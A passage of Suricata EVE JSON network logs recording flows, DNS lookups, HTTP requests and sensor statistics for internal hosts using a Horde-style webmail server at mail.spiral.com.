,"memcap":0}}} {"timestamp":"2020-02-29T00:05:23.000408+0000","flow_id":568154018685187,"event_type":"flow","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":19,"bytes_toserver":3325,"bytes_toclient":14106,"start":"2020-02-29T00:04:06.663811+0000","end":"2020-02-29T00:04:22.205376+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:23.472786+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41142,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35915,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:23.581640+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41142,"proto":"UDP","dns":{"type":"answer","id":35915,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:23.581640+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41142,"proto":"UDP","dns":{"type":"answer","id":35915,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:23.743422+0000","flow_id":83501324109156,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897}} {"timestamp":"2020-02-29T00:05:28.745767+0000","flow_id":83501324109156,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34742,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:05:29.000140+0000","event_type":"stats","stats":{"uptime":13981,"capture":{"kernel_packets":133423,"kernel_drops":0},"decoder":{"pkts":133438,"bytes":92373299,"invalid":181,"ipv4":131993,"ipv6":8,"ethernet":133438,"raw":0,"null":0,"sll":0,"tcp":126908,"udp":4890,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2701,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2717,"synack":2708,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632}
,"detect":{"alert":24},"app_layer":{"flow":{"http":1744,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2229,"failed_udp":110},"tx":{"http":4525,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2306}},"flow_mgr":{"closed_pruned":2681,"new_pruned":15,"est_pruned":2270,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22488,"memcap_state":0,"memcap_global":0},"http":{"memuse":69495,"memcap":0}}} {"timestamp":"2020-02-29T00:05:29.001158+0000","flow_id":1313463988770583,"event_type":"flow","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":34,"pkts_toclient":37,"bytes_toserver":4254,"bytes_toclient":39885,"start":"2020-02-29T00:04:09.251671+0000","end":"2020-02-29T00:04:28.151570+0000","age":19,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:29.002872+0000","flow_id":1115796709773253,"event_type":"flow","src_ip":"192.168.10.81","src_port":52682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":13,"bytes_toserver":1099,"bytes_toclient":10025,"start":"2020-02-29T00:04:23.528325+0000","end":"2020-02-29T00:04:28.933275+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:05:29.640045+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51580,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43519,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:29.748633+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51580,"proto":"UDP","dns":{"type":"answer","id":43519,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:29.748633+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51580,"proto":"UDP","dns":{"type":"answer","id":43519,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.304068+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24343}} {"timestamp":"2020-02-29T00:05:30.445906+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24343},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:05:30.454866+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33976,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4505,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.563509+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33976,"proto":"UDP","dns":{"type":"answer","id":4505,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.563509+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33976,"proto":"UDP","dns":{"type":"answer","id":4505,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.623204+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} 
{"timestamp":"2020-02-29T00:05:30.623204+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:05:30.655250+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":1}} {"timestamp":"2020-02-29T00:05:30.670217+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41347,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43045,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:05:30.778890+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41347,"proto":"UDP","dns":{"type":"answer","id":43045,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.778890+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41347,"proto":"UDP","dns":{"type":"answer","id":43045,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.841339+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60298,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38798,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.949739+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60298,"proto":"UDP","dns":{"type":"answer","id":38798,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.949739+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60298,"proto":"UDP","dns":{"type":"answer","id":38798,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.985302+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 
HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:05:30.985302+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:05:31.023880+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:05:31.023880+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) 
AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} {"timestamp":"2020-02-29T00:05:32.000208+0000","flow_id":987695000028206,"event_type":"flow","src_ip":"192.168.10.122","src_port":51758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:31.230446+0000","end":"2020-02-29T00:00:31.336274+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:35.986970+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":2}} {"timestamp":"2020-02-29T00:05:35.990066+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) 
AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:05:36.000258+0000","event_type":"stats","stats":{"uptime":13988,"capture":{"kernel_packets":133488,"kernel_drops":0},"decoder":{"pkts":133497,"bytes":92407732,"invalid":181,"ipv4":132052,"ipv6":8,"ethernet":133497,"raw":0,"null":0,"sll":0,"tcp":126959,"udp":4898,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2703,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2719,"synack":2710,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1746,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2233,"failed_udp":110},"tx":{"http":4529,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2310}},"flow_mgr":{"closed_pruned":2683,"new_pruned":15,"est_pruned":2271,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":
65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23482,"memcap_state":0,"memcap_global":0},"http":{"memuse":45335,"memcap":0}}} {"timestamp":"2020-02-29T00:05:38.000700+0000","flow_id":1694633747830855,"event_type":"flow","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1875,"bytes_toclient":5458,"start":"2020-02-29T00:04:32.088135+0000","end":"2020-02-29T00:04:37.456773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:38.003807+0000","flow_id":243338513312687,"event_type":"flow","src_ip":"192.168.10.122","src_port":43094,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:37.879535+0000","end":"2020-02-29T00:00:37.984947+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:41.000331+0000","flow_id":738608386810466,"event_type":"flow","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":19,"bytes_toserver":2955,"bytes_toclient":14491,"start":"2020-02-29T00:04:22.205410+0000","end":"2020-02-29T00:04:40.307386+0000","age":18,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:05:42.416658+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50875,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50574,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:42.525766+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50875,"proto":"UDP","dns":{"type":"answer","id":50574,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:42.525766+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50875,"proto":"UDP","dns":{"type":"answer","id":50574,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:42.586343+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753}} {"timestamp":"2020-02-29T00:05:42.651930+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52688,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:05:42.653306+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/memo.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":581}} {"timestamp":"2020-02-29T00:05:43.000219+0000","event_type":"stats","stats":{"uptime":13995,"capture":{"kernel_packets":133501,"kernel_drops":0},"decoder":{"pkts":133501,"bytes":92407996,"invalid":181,"ipv4":132056,"ipv6":8,"ethernet":133501,"raw":0,"null":0,"sll":0,"tcp":126963,"udp":4898,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2703,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2719,"synack":2710,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"ale
rt":24},"app_layer":{"flow":{"http":1746,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2233,"failed_udp":110},"tx":{"http":4529,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2310}},"flow_mgr":{"closed_pruned":2684,"new_pruned":15,"est_pruned":2272,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23482,"memcap_state":0,"memcap_global":0},"http":{"memuse":79941,"memcap":0}}} {"timestamp":"2020-02-29T00:05:43.001130+0000","flow_id":370778783283435,"event_type":"flow","src_ip":"192.168.10.122","src_port":53380,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:42.391403+0000","end":"2020-02-29T00:00:42.497019+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:45.000426+0000","flow_id":2022601730571069,"event_type":"flow","src_ip":"192.168.10.122","src_port":59941,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:44.604989+0000","end":"2020-02-29T00:00:44.710471+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:46.007700+0000","flow_id":1186461792399658,"event_type":"flow","src_ip":"192.168.10.122","src_port":44196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:44.913706+0000","end":"2020-02-29T00:00:45.019117+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
